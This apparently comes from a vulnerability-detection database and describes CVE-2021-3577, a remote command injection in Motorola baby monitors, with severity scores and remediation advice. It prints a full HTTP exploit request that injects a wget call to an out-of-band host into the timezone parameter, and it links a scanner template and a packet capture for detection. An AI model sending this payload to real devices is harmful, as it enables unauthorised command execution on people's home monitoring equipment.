🔙 목록으로 돌아가기

CVE-2021-3577: Motorola Baby Monitors - Remote Command Execution

TitleMotorola Baby Monitors - Remote Command Execution
Authorgy741
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.
RemediationApply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks.
CVSS Score8.8
EPSS Score0.86428
CVE IDCVE-2021-3577
CWE IDCWE-863,CWE-78
Tags cve2021 cve rce oast motorola iot binatoneglobal vkev vuln

🔍 Vulnerability Description

Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

🌐 HTTP Request

GET /?action=command&command=set_city_timezone&value=$(wget%20http://d5jnurple0o09a6bsl4gch65z8mpaz11y.oast.live)) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Connection: close
Accept: */*
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3577.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-3577.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A